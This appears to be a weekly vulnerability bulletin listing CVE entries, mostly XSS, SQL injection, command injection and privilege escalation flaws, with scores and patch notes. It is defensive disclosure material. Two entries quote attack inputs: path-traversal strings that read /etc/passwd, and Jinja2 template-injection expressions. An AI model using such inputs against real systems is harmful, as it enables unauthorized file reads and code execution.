| PHPOffice--PhpSpreadsheet |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Versions prior to 3.7.0, 2.3.5, 2.1.6, and 1.29.7 are vulnerable to unauthorized reflected cross-site scripting in the `Currency.php` file. Using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` script, an attacker can perform a cross-site scripting attack. Versions 3.7.0, 2.3.5, 2.1.6, and 1.29.7 contain a patch for the issue. | 2025-01-03 | not yet calculated | CVE-2024-56409 |
| PHPOffice--PhpSpreadsheet |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Versions prior to 3.7.0, 2.3.5, 2.1.6, and 1.29.7 have a cross-site scripting (XSS) vulnerability in custom properties. The HTML page is generated without clearing custom properties. Versions 3.7.0, 2.3.5, 2.1.6, and 1.29.7 contain a patch for the issue. | 2025-01-03 | not yet calculated | CVE-2024-56410 |
| PHPOffice--PhpSpreadsheet |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Versions prior to 3.7.0, 2.3.5, 2.1.6, and 1.29.7 have a cross-site scripting (XSS) vulnerability of the hyperlink base in the HTML page header. The HTML page is formed without sanitizing the hyperlink base. Versions 3.7.0, 2.3.5, 2.1.6, and 1.29.7 contain a patch for the issue. | 2025-01-03 | not yet calculated | CVE-2024-56411 |
| PHPOffice--PhpSpreadsheet |
PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Versions prior to 3.7.0, 2.3.5, 2.1.6, and 1.29.7 are vulnerable to bypass of the cross-site scripting sanitizer using the javascript protocol and special characters. An attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link. Versions 3.7.0, 2.3.5, 2.1.6, and 1.29.7 contain a patch for the issue. | 2025-01-03 | not yet calculated | CVE-2024-56412 |
| RockChinQ--free-one-api |
free-one-api allows users to access large language model reverse engineering libraries through the standard OpenAI API format. In versions up to and including 1.0.1, MD5 is used to hash passwords before sending them to the backend. MD5 is a cryptographically broken hashing algorithm and is no longer considered secure for password storage or transmission. It is vulnerable to collision attacks and can be easily cracked using modern hardware, exposing user credentials to potential compromise. As of time of publication, a replacement for MD5 has not been committed to the free-one-api GitHub repository. | 2024-12-30 | not yet calculated | CVE-2024-56516 |
| siyuan-note--siyuan |
SiYuan is self-hosted, open source personal knowledge management software. SiYuan Note version 3.1.18 has an arbitrary file deletion vulnerability. The vulnerability exists in the `POST /api/history/getDocHistoryContent` endpoint. An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server. Commit d9887aeec1b27073bec66299a9a4181dc42969f3 fixes this vulnerability and is expected to be available in version 3.1.19. | 2025-01-03 | not yet calculated | CVE-2025-21609 |
| SoftIron--HyperCloud |
An issue exists in SoftIron HyperCloud where authenticated, but non-admin users can create data pools, which could potentially impact the performance and availability of the backend software-defined storage subsystem. This issue only impacts SoftIron HyperCloud and related software products (such as VM Squared) software versions 2.3.0 to before 2.5.0. | 2024-12-30 | not yet calculated | CVE-2024-13058 |
| tltneon--lgsl |
LGSL (Live Game Server List) provides online status lists for online video games. Versions up to and including 6.2.1 contain a reflected cross-site scripting vulnerability in the `Referer` HTTP header. The vulnerability allows attackers to inject arbitrary JavaScript code, which is reflected in the HTML response without proper sanitization. When crafted malicious input is provided in the `Referer` header, it is echoed back into an HTML attribute in the application's response. Commit 7ecb839df9358d21f64cdbff5b2536af25a77de1 contains a patch for the issue. | 2024-12-30 | not yet calculated | CVE-2024-56517 |
| Unknown--AHAthat Plugin |
The AHAthat Plugin WordPress plugin through 1.6 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers | 2025-01-02 | not yet calculated | CVE-2024-12595 |
| Unknown--goodlayers-core |
The goodlayers-core WordPress plugin before 2.0.10 does not sanitise and escape some of its settings, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2025-01-02 | not yet calculated | CVE-2024-11357 |
| Unknown--wp-enable-svg |
The wp-enable-svg WordPress plugin through 0.7 does not sanitize SVG files when uploaded, allowing for authors and above to upload SVGs containing malicious scripts | 2025-01-02 | not yet calculated | CVE-2024-11184 |
| Webmin--Webmin |
Webmin CGI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Webmin. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of CGI requests. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-22346. | 2024-12-30 | not yet calculated | CVE-2024-12828 |
Vulnerability Summary for the Week of December 23, 2024
Posted on Monday December 30, 2024
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000 Projects--Attendance Tracking Management System |
A vulnerability was found in 1000 Projects Attendance Tracking Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/course_action.php. The manipulation of the argument course_code leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-23 | 7.3 | CVE-2024-12899 |
| Global Wisdom Software--ANCHOR |
ANCHOR from Global Wisdom Software is an integrated product running on a Windows virtual machine. The underlying Windows OS of the product contains high-privilege service accounts. If these accounts use default passwords, attackers could remotely log in to the virtual machine using the default credentials. | 2024-12-23 | 8.4 | CVE-2024-12902 |
| Huawei--FusionCompute |
There is an improper interface design vulnerability in Huawei product. A module interface of the impated product does not deal with some operations properly. Attackers can exploit this vulnerability to perform malicious operatation to compromise module service. (Vulnerability ID: HWPSIRT-2020-05010) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9236. | 2024-12-27 | 8.8 | CVE-2020-9236 |
| Huawei--FusionCompute |
There is a privilege escalation vulnerability in Huawei FusionCompute product. Due to insufficient verification on specific files that need to be deserialized, local attackers can exploit this vulnerability to elevate permissions. (Vulnerability ID: HWPSIRT-2020-05241) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9222. | 2024-12-27 | 7 | CVE-2020-9222 |
| Huawei--HarmonyOS |
Some Huawei wearables have a vulnerability of not verifying the actual data size when reading data. Successful exploitation of this vulnerability may cause a server out of memory (OOM). | 2024-12-28 | 7.5 | CVE-2021-22484 |
| Huawei--HarmonyOS |
Some Huawei wearables have a permission management vulnerability. | 2024-12-28 | 7.7 | CVE-2021-37000 |
| Huawei--HUAWEI Mate 20 Pro |
There is an improper privilege management vulnerability in Huawei smart phone product. A local, authenticated attacker could craft a specific input to exploit this vulnerability. Successful exploitation may lead to local privilege escalation. (Vulnerability ID: HWPSIRT-2020-05272) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9080. | 2024-12-27 | 7.8 | CVE-2020-9080 |
| n/a -- n/a |
The WooCommerce Point of Sale plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0. This is due to insufficient validation on the 'logged_in_user_id' value when option values are empty and the ability for attackers to change the email of arbitrary user accounts. This makes it possible for unauthenticated attackers to change the email of arbitrary user accounts, including administrators, and reset their password to gain access to the account. | 2024-12-25 | 9.8 | CVE-2024-11281 |
| n/a -- n/a |
In libxml2 2.11 before 2.11.9, 2.12 before 2.12.9, and 2.13 before 2.13.3, the SAX parser can produce events for external entities even if custom SAX handlers try to override entity content (by setting "checked"). This makes classic XXE attacks possible. | 2024-12-23 | 9.1 | CVE-2024-40896 |
| n/a -- n/a |
An SQL injection vulnerability in Traffic Ops in Apache Traffic Control <= 8.0.1, >= 8.0.0 allows a privileged user with role "admin", "federation", "operations", "portal", or "steering" to execute arbitrary SQL against the database by sending a specially-crafted PUT request. Users are recommended to upgrade to version Apache Traffic Control 8.0.2 if you run an affected version of Traffic Ops. | 2024-12-23 | 9.9 | CVE-2024-45387 |
| n/a -- n/a |
SQL injection vulnerability in Smart Agent v.1.1.0 allows a remote attacker to execute arbitrary code via the id parameter in the /sendPushManually.php component. | 2024-12-27 | 9.8 | CVE-2024-50716 |
| n/a -- n/a |
SQL injection vulnerability in Smart Agent v.1.1.0 allows a remote attacker to execute arbitrary code via the client parameter in the /recuperaLog.php component. | 2024-12-27 | 9.8 | CVE-2024-50717 |
| n/a -- n/a |
Integer overflow vulnerability exists in SimplCommerce at commit 230310c8d7a0408569b292c5a805c459d47a1d8f in the shopping cart functionality. The issue lies in the quantity parameter in the CartController's AddToCart method. | 2024-12-27 | 9.8 | CVE-2024-50944 |
| n/a -- n/a |
Gogs is an open source self-hosted Git service. A malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server. The vulnerability is fixed in 0.13.1. | 2024-12-23 | 9.8 | CVE-2024-54148 |
| n/a -- n/a |
An issue was discovered in Kurmi Provisioning Suite 7.9.0.33. If an X-Forwarded-For header is received during authentication, the Kurmi application will record the (possibly forged) IP address mentioned in that header rather than the real IP address that the user logged in from. This fake IP address can later be displayed in the My Account popup that shows the IP address that was used to log in. | 2024-12-27 | 9.4 | CVE-2024-54450 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Arne Informatics Piramit Automation allows Blind SQL Injection.This issue affects Piramit Automation: before 27.09.2024. | 2024-12-25 | 9.9 | CVE-2024-8950 |
| n/a -- n/a |
Huawei Home Music System has a path traversal vulnerability. Successful exploitation of this vulnerability may cause the music host file to be deleted or the file permission to be changed.(Vulnerability ID:HWPSIRT-2023-60613) | 2024-12-26 | 8 | CVE-2023-7300 |
| n/a -- n/a |
The WP Travel Engine - Elementor Widgets | Create Travel Booking Website Using WordPress and Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.7 via several widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2024-12-25 | 8.8 | CVE-2024-12272 |
| n/a -- n/a |
The Custom Login Page Styler - Login Protected Private Site , Change wp-admin login url , WordPress login logo , Temporary admin login access , Rename login , Login customizer, Hide wp-login - Limit Login Attempts - Locked Site plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the 'lps_generate_temp_access_url' AJAX action in all versions up to, and including, 7.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to login as other users such as subscribers. | 2024-12-24 | 8.8 | CVE-2024-12594 |
| n/a -- n/a |
A SQL injection in the Amazon Redshift JDBC Driver in v2.1.0.31 allows a user to gain escalated privileges via the getSchemas, getTables, or getColumns Metadata APIs. Users should upgrade to the driver version 2.1.0.32 or revert to driver version 2.1.0.30. | 2024-12-24 | 8 | CVE-2024-12744 |
| n/a -- n/a |
A SQL injection in the Amazon Redshift Python Connector v2.1.4 allows a user to gain escalated privileges via the get_schemas, get_tables, or get_columns Metadata APIs. Users are recommended to upgrade to the driver version 2.1.5 or revert to driver version 2.1.3. | 2024-12-24 | 8 | CVE-2024-12745 |
| n/a -- n/a |
A SQL injection in the Amazon Redshift ODBC Driver v2.1.5.0 (Windows or Linux) allows a user to gain escalated privileges via the SQLTables or SQLColumns Metadata APIs. Users are recommended to upgrade to the driver version 2.1.6.0 or revert to driver version 2.1.4.0. | 2024-12-24 | 8 | CVE-2024-12746 |
| n/a -- n/a |
The PlugVersions - Easily rollback to previous versions of your plugins plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the eos_plugin_reviews_restore_version() function in all versions up to, and including, 0.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary files leveraging files included locally. | 2024-12-24 | 8.8 | CVE-2024-12881 |
| n/a -- n/a |
A vulnerability was found in Pagure. Support of symbolic links during repository archiving of repositories allows the disclosure of local files. This flaw allows a malicious user to take advantage of the Pagure instance. | 2024-12-24 | 8.1 | CVE-2024-47515 |
| n/a -- n/a |
Dell ECS, versions prior to 3.8.1.3 contains an arithmetic overflow vulnerability exists in retention period handling of ECS. An authenticated user with bucket or object-level access and the necessary privileges could potentially exploit this vulnerability to bypass retention policies and delete objects. | 2024-12-26 | 8.1 | CVE-2024-51540 |
| n/a -- n/a |
The Addressing GLPI plugin enables you to create IP reports for visualize IP addresses used and free on a given network.. Starting with 3.0.0 and before 3.0.3, a poor security check allows an unauthenticated attacker to determine whether data exists (by name) in GLPI. | 2024-12-26 | 8.2 | CVE-2024-53850 |
| n/a -- n/a |
TOTOLINK A3002R V4.0.0-B20230531.1404 is vulnerable to Remote Code Execution in /bin/boa via formWsc. | 2024-12-26 | 8.8 | CVE-2024-54907 |
| n/a -- n/a |
Jinja is an extensible templating engine. Prior to 3.1.5, a bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of if Jinja's sandbox is used. To exploit the vulnerability, an attacker needs to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates where the template author can also choose the template filename. This vulnerability is fixed in 3.1.5. | 2024-12-23 | 8.8 | CVE-2024-56201 |
| n/a -- n/a |
changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. Improper input validation in the application can allow attackers to perform local file read (LFR) or path traversal attacks. These vulnerabilities occur when user input is used to construct file paths without adequate sanitization or validation. For example, using file:../../../etc/passwd or file: ///etc/passwd can bypass weak validations and allow unauthorized access to sensitive files. Even though this has been addressed in previous patch, it is still insufficient. This vulnerability is fixed in 0.48.05. | 2024-12-27 | 8.6 | CVE-2024-56509 |
| n/a -- n/a |
HarfBuzz is a text shaping engine. Starting with 8.5.0 through 10.0.1, there is a heap-based buffer overflow in the hb_cairo_glyphs_from_buffer function. | 2024-12-27 | 8.8 | CVE-2024-56732 |
| n/a -- n/a |
Some Huawei home music system products have a path traversal vulnerability. Successful exploitation of this vulnerability may cause unauthorized file deletion or file permission change.(Vulnerability ID:HWPSIRT-2023-53450) This vulnerability has been assigned a (CVE)ID:CVE-2023-7263 | 2024-12-28 | 7.3 | CVE-2023-7263 |
| n/a -- n/a |
Some Huawei home routers have a connection hijacking vulnerability. Successful exploitation of this vulnerability may cause DoS or information leakage.(Vulnerability ID:HWPSIRT-2023-76605) This vulnerability has been assigned a (CVE)ID:CVE-2023-7266 | 2024-12-28 | 7.5 | CVE-2023-7266 |
| n/a -- n/a |
The WP Data Access - App, Table, Form and Chart Builder plugin plugin for WordPress is vulnerable to SQL Injection via the 'order[user_login][dir]' parameter in all versions up to, and including, 5.5.22 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-25 | 7.5 | CVE-2024-12428 |
| n/a -- n/a |
A flaw was found in the skupper console, a read-only interface that renders cluster network, traffic details, and metrics for a network application that a user sets up across a hybrid multi-cloud environment. When the default authentication method is used, a random password is generated for the "admin" user and is persisted in either a Kubernetes secret or a podman volume in a plaintext file. This authentication method can be manipulated by an attacker, leading to the reading of any user-readable file in the container filesystem, directly impacting data confidentiality. Additionally, the attacker may induce skupper to read extremely large files into memory, resulting in resource exhaustion and a denial of service attack. | 2024-12-24 | 7.1 | CVE-2024-12582 |
| n/a -- n/a |
The Four-Faith router models F3x24 and F3x36 are affected by an operating system (OS) command injection vulnerability. At least firmware version 2.0 allows authenticated and remote attackers to execute arbitrary OS commands over HTTP when modifying the system time via apply.cgi. Additionally, this firmware version has default credentials which, if not changed, would effectively change this vulnerability into an unauthenticated and remote OS command execution issue. | 2024-12-27 | 7.2 | CVE-2024-12856 |
| n/a -- n/a |
Incorrect default permissions vulnerability in Evoko Home, affecting version 2.4.2 to 2.7.4. A non-admin user could exploit weak file and folder permissions to escalate privileges, execute arbitrary code and maintain persistence on the compromised machine. It has been identified that full control permissions exist on the 'Everyone' group (i.e. any user who has local access to the operating system regardless of their privileges). | 2024-12-23 | 7.8 | CVE-2024-12903 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in 1000 Projects Attendance Tracking Management System 1.0. Affected by this issue is some unknown functionality of the file /faculty/check_faculty_login.php. The manipulation of the argument faculty_emailid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-25 | 7.3 | CVE-2024-12927 |
| n/a -- n/a |
A vulnerability has been found in 1000 Projects Attendance Tracking Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/student_action.php. The manipulation of the argument student_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12940 |
| n/a -- n/a |
A vulnerability was found in 1000 Projects Portfolio Management System MCA 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/admin_login.php. The manipulation of the argument username/password leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12942 |
| n/a -- n/a |
A vulnerability was found in CodeAstro House Rental Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /ownersignup.php. The manipulation of the argument f/e/p/m/o/n/c/s/ci/a leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "m" to be affected. But it must be assumed that many other parameters are affected as well. | 2024-12-26 | 7.3 | CVE-2024-12943 |
| n/a -- n/a |
A vulnerability was found in CodeAstro House Rental Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /signin.php. The manipulation of the argument u/p leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12944 |
| n/a -- n/a |
A vulnerability classified as critical was found in code-projects Simple Car Rental System 1.0. This vulnerability affects unknown code of the file /account.php. The manipulation of the argument email/pass leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12945 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in 1000 Projects Attendance Tracking Management System 1.0. This issue affects some unknown processing of the file /admin/admin_action.php. The manipulation of the argument admin_user_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12946 |
| n/a -- n/a |
A vulnerability classified as critical has been found in 1000 Projects Portfolio Management System MCA 1.0. This affects an unknown part of the file /update_pro_details.php. The manipulation of the argument q leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12958 |
| n/a -- n/a |
A vulnerability classified as critical was found in 1000 Projects Portfolio Management System MCA 1.0. This vulnerability affects unknown code of the file /update_personal_details.php. The manipulation of the argument q leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12959 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in 1000 Projects Portfolio Management System MCA 1.0. This issue affects some unknown processing of the file /update_edu_details.php. The manipulation of the argument q leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12960 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in 1000 Projects Portfolio Management System MCA 1.0. Affected is an unknown function of the file /update_ach_details.php. The manipulation of the argument q leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12961 |
| n/a -- n/a |
A vulnerability has been found in code-projects Job Recruitment 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /_parse/_all_edits.php. The manipulation of the argument skillset leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12962 |
| n/a -- n/a |
A vulnerability was found in code-projects Job Recruitment 1.0 and classified as critical. Affected by this issue is the function add_xp of the file /_parse/_all_edits.php. The manipulation of the argument job_company leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-26 | 7.3 | CVE-2024-12963 |
| n/a -- n/a |
A vulnerability was found in 1000 Projects Daily College Class Work Report Book 1.0. It has been classified as critical. This affects an unknown part of the file /login.php. The manipulation of the argument user leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12964 |
| n/a -- n/a |
A vulnerability was found in 1000 Projects Portfolio Management System MCA 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /update_ex_detail.php. The manipulation of the argument q leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12965 |
| n/a -- n/a |
A vulnerability was found in code-projects Job Recruitment 1.0. It has been rated as critical. This issue affects the function cn_update of the file /_parse/_all_edits.php. The manipulation of the argument cname/url leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12966 |
| n/a -- n/a |
A vulnerability classified as critical has been found in code-projects Job Recruitment 1.0. Affected is the function fln_update of the file /_parse/_all_edits.php. The manipulation of the argument fname/lname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12967 |
| n/a -- n/a |
A vulnerability classified as critical was found in code-projects Job Recruitment 1.0. Affected by this vulnerability is the function edit_jobpost of the file /_parse/_all_edits.php. The manipulation of the argument jobtype leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-26 | 7.3 | CVE-2024-12968 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in code-projects Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/index.php of the component Login. The manipulation of the argument username/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 7.3 | CVE-2024-12969 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in CodeZips Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file /staff.php. The manipulation of the argument tel leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-27 | 7.3 | CVE-2024-12976 |
| n/a -- n/a |
A vulnerability has been found in code-projects Job Recruitment 1.0 and classified as critical. This vulnerability affects the function add_req of the file /_parse/_all_edits.php. The manipulation of the argument jid/limit leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-27 | 7.3 | CVE-2024-12978 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in DrayTek Vigor2960 and Vigor300B 1.5.1.3/1.5.1.4. This issue affects some unknown processing of the file /cgi-bin/mainfunction.cgi/apmcfgupptim of the component Web Management Interface. The manipulation of the argument session leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component. | 2024-12-27 | 7.3 | CVE-2024-12986 |
| n/a -- n/a |
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component. | 2024-12-27 | 7.3 | CVE-2024-12987 |
| n/a -- n/a |
A vulnerability has been found in Netgear R6900P and R7000P 1.3.3.154 and classified as critical. Affected by this vulnerability is the function sub_16C4C of the component HTTP Header Handler. The manipulation of the argument Host leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-27 | 7.3 | CVE-2024-12988 |
| n/a -- n/a |
A vulnerability was found in 1000 Projects Bookstore Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /order_process.php. The manipulation of the argument fnm leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 7.3 | CVE-2024-13002 |
| n/a -- n/a |
A vulnerability classified as critical has been found in PHPGurukul Complaint Management System 1.0. This affects an unknown part of the file /admin/category.php. The manipulation of the argument state leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 7.3 | CVE-2024-13004 |
| n/a -- n/a |
A vulnerability, which was classified as critical, has been found in 1000 Projects Human Resource Management System 1.0. This issue affects some unknown processing of the file /employeeview.php. The manipulation of the argument search leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 7.3 | CVE-2024-13006 |
| n/a -- n/a |
Software installed and run as a non-privileged user can trigger the GPU kernel driver to write to arbitrary read-only system files that have been mapped into application memory. | 2024-12-28 | 7.8 | CVE-2024-43705 |
| n/a -- n/a |
Fields is a GLPI plugin that allows users to add custom fields on GLPI items forms. Prior to 1.21.13, an authenticated user can perform a SQL injection when the plugin is active. The vulnerability is fixed in 1.21.13. | 2024-12-26 | 7.7 | CVE-2024-45600 |
| n/a -- n/a |
Software installed and run as a non-privileged user may conduct improper GPU system calls to trigger use-after-free kernel exceptions. | 2024-12-28 | 7.8 | CVE-2024-46973 |
| n/a -- n/a |
Dell NativeEdge, version(s) 2.1.0.0, contain(s) an Execution with Unnecessary Privileges vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2024-12-25 | 7.8 | CVE-2024-47978 |
| n/a -- n/a |
A Server-Side Request Forgery (SSRF) in smarts-srl.com Smart Agent v.1.1.0 allows a remote attacker to obtain sensitive information via a crafted script to the /FB/getFbVideoSource.php component. | 2024-12-27 | 7.5 | CVE-2024-50714 |
| n/a -- n/a |
An issue in smarts-srl.com Smart Agent v.1.1.0 allows a remote attacker to obtain sensitive information via command injection through a vulnerable unsanitized parameter defined in the /youtubeInfo.php component. | 2024-12-27 | 7.5 | CVE-2024-50715 |
| n/a -- n/a |
An improper access control vulnerability exists in SimplCommerce at commit 230310c8d7a0408569b292c5a805c459d47a1d8f, allowing users to submit reviews without verifying if they have purchased the product. | 2024-12-27 | 7.5 | CVE-2024-50945 |
| n/a -- n/a |
Dell SupportAssist for Home PCs versions 4.6.1 and prior and Dell SupportAssist for Business PCs versions 4.5.0 and prior, contain a symbolic link (symlink) attack vulnerability in the software remediation component. A low-privileged authenticated user could potentially exploit this vulnerability, gaining privileges escalation, leading to arbitrary deletion of files and folders from the system. | 2024-12-25 | 7.1 | CVE-2024-52535 |
| n/a -- n/a |
Rizin is a UNIX-like reverse engineering framework and command-line toolset. `rizin.c` still had an old snippet of code which suffered a command injection due the usage of `rz_core_cmdf` to invoke the command `m` which was removed in v0.1.x. A malicious binary defining `bclass` (part of RzBinInfo) is executed if `rclass` (part of RzBinInfo) is set to `fs`; the vulnerability can be exploited by any bin format where `bclass` and `rclass` are user defined. This vulnerability is fixed in 0.7.4. | 2024-12-23 | 7.8 | CVE-2024-53256 |
| n/a -- n/a |
Dell NativeEdge, version(s) 2.1.0.0, contain(s) an Exposure of Sensitive Information Through Metadata vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure. | 2024-12-25 | 7.5 | CVE-2024-53291 |
| n/a -- n/a |
ColdFusion versions 2023.11, 2021.17 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access files or directories that are outside of the restricted directory set by the application. This could lead to the disclosure of sensitive information or the manipulation of system data. | 2024-12-23 | 7.4 | CVE-2024-53961 |
| n/a -- n/a |
Jinja is an extensible templating engine. Prior to 3.1.5, An oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to store a reference to a malicious string's format method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox. This vulnerability is fixed in 3.1.5. | 2024-12-23 | 7.8 | CVE-2024-56326 |
| n/a -- n/a |
Navidrome is an open source web-based music collection server and streamer. Navidrome stores the JWT secret in plaintext in the navidrome.db database file under the property table. This practice introduces a security risk because anyone with access to the database file can retrieve the secret. This vulnerability is fixed in 0.54.1. | 2024-12-23 | 7.1 | CVE-2024-56362 |
| n/a -- n/a |
APTRS (Automated Penetration Testing Reporting System) is a Python and Django-based automated reporting tool designed for penetration testers and security organizations. In 1.0, there is a vulnerability in the web application's handling of user-supplied input that is incorporated into a Jinja2 template. Specifically, when user input is improperly sanitized or validated, an attacker can inject Jinja2 syntax into the template, causing the server to execute arbitrary code. For example, an attacker might be able to inject expressions like {{ config }}, {{ self.class.mro[1].subclasses() }}, or more dangerous payloads that trigger execution of arbitrary Python code. The vulnerability can be reproduced by submitting crafted input to all the template fields handled by ckeditor, that are passed directly to a Jinja2 template. If the input is rendered without sufficient sanitization, it results in the execution of malicious Jinja2 code on the server. | 2024-12-23 | 7.8 | CVE-2024-56363 |
| n/a -- n/a |
LinkAce is a self-hosted archive to collect links of your favorite websites. Prior to 1.15.6, a file upload vulnerability exists in the LinkAce. This issue occurs in the "Import Bookmarks" functionality, where malicious HTML files can be uploaded containing JavaScript payloads. These payloads execute when the uploaded links are accessed, leading to potential reflected or persistent XSS scenarios. This vulnerability is fixed in 1.15.6. | 2024-12-27 | 7.6 | CVE-2024-56508 |
| n/a -- n/a |
An issue was discovered in TCPDF before 6.8.0. The Error function lacks an htmlspecialchars call for the error message. | 2024-12-27 | 7.5 | CVE-2024-56527 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
